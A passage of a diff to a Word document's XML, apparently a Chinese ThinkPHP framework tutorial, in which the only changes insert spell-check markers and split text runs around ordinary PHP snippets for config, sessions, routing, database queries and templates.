+              <w:t>Config</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>::parse(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>APP_PATH.'my_config.xml','xml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>');</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3084,7 +3349,23 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>echo Config::get('</w:t>
+              <w:t xml:space="preserve">echo </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>::get('</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3164,12 +3445,21 @@
               </w:rPr>
               <w:t xml:space="preserve">    </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config::set('</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>::set('</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3713,7 +4003,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Session::init([</w:t>
+              <w:t>Session::</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>init</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>([</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3770,7 +4074,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">      'auto_start'     =&gt; true, //</w:t>
+              <w:t xml:space="preserve">      '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>auto_start</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'     =&gt; true, //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3818,7 +4136,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Session::set('name','thinkphp',</w:t>
+              <w:t>Session::set('name','</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>thinkphp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4267,7 +4599,15 @@
               <w:ind w:firstLineChars="150" w:firstLine="315"/>
             </w:pPr>
             <w:r>
-              <w:t>Cookie::init(</w:t>
+              <w:t>Cookie::</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>init</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4330,9 +4670,11 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>Set,get,delete,clear</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4471,9 +4813,11 @@
             <w:r>
               <w:t>需要在</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4521,7 +4865,21 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'url_route_on'  =&gt;  true,</w:t>
+                    <w:t>'</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellStart"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>url_route_on</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellEnd"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'  =&gt;  true,</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -4529,7 +4887,21 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'url_route_must'=&gt;  false,</w:t>
+                    <w:t>'</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellStart"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>url_route_must</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellEnd"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'=&gt;  false,</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4558,7 +4930,21 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'url_route_on'  =&gt;  true,</w:t>
+                    <w:t>'</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellStart"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>url_route_on</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellEnd"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'  =&gt;  true,</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -4566,7 +4952,21 @@
                     <w:rPr>
                       <w:color w:val="0070C0"/>
                     </w:rPr>
-                    <w:t>'url_route_must'=&gt;  true,</w:t>
+                    <w:t>'</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellStart"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>url_route_must</w:t>
+                  </w:r>
+                  <w:proofErr w:type="spellEnd"/>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'=&gt;  true,</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4606,6 +5006,7 @@
             <w:r>
               <w:t>方法类型有</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4613,7 +5014,11 @@
               <w:t>get</w:t>
             </w:r>
             <w:r>
-              <w:t>,post,put,delete,*</w:t>
+              <w:t>,post,put,delete</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>,*</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4624,7 +5029,35 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>Route::register('new/:id','New/update','POST'); //</w:t>
+              <w:t>Route::register('new/:</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>id','New</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>update','POST</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'); //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4950,9 +5383,11 @@
             <w:r>
               <w:t>）路由配置文件：</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>route.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4993,7 +5428,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'blog/:id'   =&gt; ['Blog/update',['method' =&gt; 'post|put'], ['id' =&gt; '\d+']],</w:t>
+              <w:t xml:space="preserve">    'blog/:id'   =&gt; ['Blog/update',['method' =&gt; '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>post|put</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'], ['id' =&gt; '\d+']],</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5044,7 +5493,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">Route::get('hello/:name',function($name){ </w:t>
+              <w:t>Route::get('hello/:</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>name',function</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">($name){ </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5069,7 +5532,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>return 'Hello,'.$name;</w:t>
+              <w:t>return '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Hello,'.$name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5216,7 +5693,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>'blog/:id'   =&gt; ['Blog/update',['method' =&gt; 'post|put'], [</w:t>
+              <w:t>'blog/:id'   =&gt; ['Blog/update',['method' =&gt; '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>post|put</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'], [</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5379,6 +5870,7 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>C</w:t>
             </w:r>
@@ -5389,16 +5881,35 @@
               <w:t>onfig</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">.php:   </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'url_domain_deploy' =&gt;  true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>.php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">:   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>url_domain_deploy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>' =&gt;  true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>R</w:t>
             </w:r>
@@ -5409,7 +5920,11 @@
               <w:t>oute.</w:t>
             </w:r>
             <w:r>
-              <w:t>php:</w:t>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5872,7 +6387,25 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>","shidandan");//</w:t>
+              <w:t>","</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>shidandan</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>");//</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6027,9 +6560,11 @@
             <w:r>
               <w:t>：</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>url</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>为不存在的操作时调用</w:t>
             </w:r>
@@ -6133,9 +6668,11 @@
             <w:r>
               <w:t>名可以</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>中修改</w:t>
             </w:r>
@@ -6325,12 +6862,14 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6343,9 +6882,11 @@
               </w:rPr>
               <w:t>在</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>database.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6368,6 +6909,7 @@
               </w:rPr>
               <w:t>公共的</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6375,6 +6917,7 @@
               </w:rPr>
               <w:t>Db</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -6456,21 +6999,71 @@
                 <w:sz w:val="20"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>Db::query('select * from think_user where id=?',[8]);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>Db</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>Db::execute('insert into think_user (id, name) values (?, ?)',[8,'thinkphp']);</w:t>
+              <w:t xml:space="preserve">::query('select * from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>think_user</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where id=?',[8]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>Db</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">::execute('insert into </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>think_user</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> (id, name) values (?, ?)',[8,'thinkphp']);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6874,7 +7467,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>return $view-&gt;fetch('hello',['name'=&gt;'thinkphp']);</w:t>
+              <w:t>return $view-&gt;fetch('hello',['name'=&gt;'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>thinkphp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>']);</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7011,7 +7618,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>return $view-&gt;show($content,$vars);</w:t>
+              <w:t>return $view-&gt;show($content,$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>vars</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7222,7 +7843,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'name'=&gt;'ThinkPHP',</w:t>
+              <w:t xml:space="preserve">    'name'=&gt;'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7373,7 +8008,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$view-&gt;name =   'ThinkPHP';</w:t>
+              <w:t>$view-&gt;name =   '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>';</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7447,12 +8096,14 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -7471,12 +8122,14 @@
               </w:rPr>
               <w:t>的性能卓越的模板引擎，这是一个专门为</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -7708,7 +8361,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;tr&gt;</w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>tr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7857,7 +8524,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;/tr&gt;</w:t>
+              <w:t>&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>tr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7878,7 +8559,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>{volist name="</w:t>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>volist</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name="</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7891,8 +8586,16 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>" id="row"}  //volist</w:t>
-            </w:r>
+              <w:t>" id="row"}  //</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>volist</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -7906,12 +8609,14 @@
               </w:rPr>
               <w:t>循环输出，类似</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:t>foreach</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7930,7 +8635,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;tr&gt;</w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>tr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7956,7 +8675,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;td align="center"&gt;{$row.id}&lt;/td&gt;</w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>td</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> align="center"&gt;{$row.id}&lt;/td&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7982,7 +8715,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;td&gt;{$row.username}&lt;/td&gt;</w:t>
+              <w:t>&lt;td&gt;{$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>row.username</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}&lt;/td&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8008,7 +8755,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;td&gt;{$row.email}&lt;/td&gt;</w:t>
+              <w:t>&lt;td&gt;{$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>row.email</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}&lt;/td&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8028,7 +8789,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;/tr&gt;</w:t>
+              <w:t>&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>tr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8048,7 +8823,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>{/volist}</w:t>
+              <w:t>{/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>volist</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8089,7 +8878,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$user=D("barret/User");</w:t>
+              <w:t>$user=D("</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>barret</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/User");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8154,6 +8957,7 @@
               <w:tab/>
               <w:t>$view-&gt;assign("</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -8165,7 +8969,14 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>",$result);</w:t>
+              <w:t>",$result</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8390,12 +9201,14 @@
               </w:rPr>
               <w:t>原样输出，不会被解析成</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
